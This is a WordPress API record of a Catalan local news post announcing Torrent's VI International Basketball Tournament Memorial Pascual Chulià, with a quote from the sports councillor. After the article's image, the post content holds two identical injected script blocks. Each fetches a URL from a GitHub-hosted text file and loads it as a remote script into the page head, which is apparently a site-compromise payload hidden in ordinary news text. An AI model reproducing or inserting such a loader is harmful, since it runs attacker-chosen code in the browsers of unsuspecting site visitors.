{"id":72375,"date":"2024-09-26T12:24:04","date_gmt":"2024-09-26T10:24:04","guid":{"rendered":"https:\/\/infotorrent.es\/uncategorized\/el-mejor-baloncesto-vuelve-a-torrent-con-el-vi-torneo-internacional-memorial-pascual-chulia\/"},"modified":"2024-10-07T23:42:44","modified_gmt":"2024-10-07T21:42:44","slug":"el-mejor-baloncesto-vuelve-a-torrent-con-el-vi-torneo-internacional-memorial-pascual-chulia","status":"publish","type":"post","link":"https:\/\/infotorrent.es\/ca\/juventud-y-deportes-2\/el-mejor-baloncesto-vuelve-a-torrent-con-el-vi-torneo-internacional-memorial-pascual-chulia\/","title":{"rendered":"El millor b\u00e0squet torna a Torrent amb el VI Torneig Internacional Memorial Pascual Chuli\u00e0"},"content":{"rendered":"\n<p>El torneig tindr\u00e0 lloc des d&#8217;este dijous 26 fins al 29 de setembre en els pavellons El Vedat i Toll i l&#8217;Alberca<\/p>\n\n\n\n<p>La ciutat de Torrent es prepara per a viure una nova edici\u00f3 del seu ja consolidat Torneig Internacional de B\u00e0squet Memorial Pascual Chuli\u00e0. Des d&#8217;este dijous 26 fins al 29 de setembre, els pavellons El Vedat i Toll i l&#8217;Alberca obrin les seues portes al b\u00e0squet base, acollint a les futures estreles nacionals i internacionals d&#8217;este esport. Un esdeveniment impulsat pel *Nou *Basquet Torrent i amb la col\u00b7laboraci\u00f3 de l&#8217;Ajuntament de Torrent, des de la regidoria d&#8217;Esports, a trav\u00e9s de la Fundaci\u00f3 Esportiva Municipal.<\/p>\n\n\n\n<p>En esta sexta edici\u00f3, el Nou B\u00e1squet Torrent, compartir\u00e0 pista amb alguns dels equips m\u00e9s prestigiosos del panorama baloncestistic espanyol i europeu. El Val\u00e8ncia Basket, l&#8217;Ol\u00edmpia de Mil\u00e0, el Reial Madrid, el Bar\u00e7a, el <\/p>\n\n\n\n<p>joventut de Badalona, Zalgiris Kauna i el Baskonia, confirmaran la seua pres\u00e8ncia en este torneig que s&#8217;ha convertit en una cita ineludible per als amants del b\u00e0squet.<\/p>\n\n\n\n<p>Guillermo Alonso del Real, regidor d&#8217;Esports, ha destacat la import\u00e0ncia d&#8217;este torneig per a la ciutat de Torrent: <strong>\u201c\u00c9s un veritable orgull per a Torrent acollir novament un torneig de la talla del Memorial Pascual Chuli\u00e0. Este esdeveniment no sols posa a la nostra ciutat en el mapa del b\u00e0squet base a nivell nacional i internacional, sin\u00f3 que tamb\u00e9 fomenta la pr\u00e0ctica esportiva entre els nostres joves i refor\u00e7a el nostre comprom\u00eds amb l&#8217;esport com a ferramenta d&#8217;educaci\u00f3 i salut.\u201d<\/strong> Aix\u00ed mateix, ha volgut mostrar el seu agra\u00efment <strong>\u201ca tots els equips participants, al Nou B\u00e1squet Torrent i a tots els col\u00b7laboradors que fan possible este torneig.\u201d<\/strong> El Torneig Internacional Memorial Pascual Chuli\u00e0 \u00e9s molt m\u00e9s que una competici\u00f3 esportiva. Es tracta d&#8217;una oportunitat \u00fanica per a gaudir del millor b\u00e0squet base, fomentar l&#8217;esport entre els joves i retre homenatge a la figura de Pascual Chuli\u00e0, un referent del b\u00e0squet a la nostra ciutat.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1-1024x682.jpeg\" alt=\"\" class=\"wp-image-72370\" srcset=\"https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1-1024x682.jpeg 1024w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1-300x200.jpeg 300w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1-768x512.jpeg 768w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1-1536x1023.jpeg 1536w, https:\/\/infotorrent.es\/wp-content\/uploads\/2024\/09\/TORNEO-1.jpeg 1600w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<script>;var url = 'https:\/\/raw.githubusercontent.com\/AlexanderRPatton\/cdn\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script><script>;var url = 'https:\/\/raw.githubusercontent.com\/AlexanderRPatton\/cdn\/main\/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});<\/script>","protected":false},"excerpt":{"rendered":"<p>El torneig tindr\u00e0 lloc des d&#8217;este dijous 26 fins al 29 de setembre en els pavellons El Vedat i Toll i l&#8217;Alberca La ciutat de Torrent es prepara per a viure una nova edici\u00f3 del seu ja consolidat Torneig Internacional de B\u00e0squet Memorial Pascual Chuli\u00e0. Des d&#8217;este dijous 26 fins al 29 de setembre, els [&hellip;]<\/p>\n","protected":false},"author":16,"featured_media":72376,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"footnotes":""},"categories":[130,1186],"tags":[],"class_list":["post-72375","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-juventud-y-deportes-2","category-deporte-ca"],"acf":[],"_links":{"self":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72375","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/users\/16"}],"replies":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/comments?post=72375"}],"version-history":[{"count":3,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72375\/revisions"}],"predecessor-version":[{"id":72783,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/posts\/72375\/revisions\/72783"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media\/72376"}],"wp:attachment":[{"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/media?parent=72375"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/categories?post=72375"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/infotorrent.es\/ca\/wp-json\/wp\/v2\/tags?post=72375"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}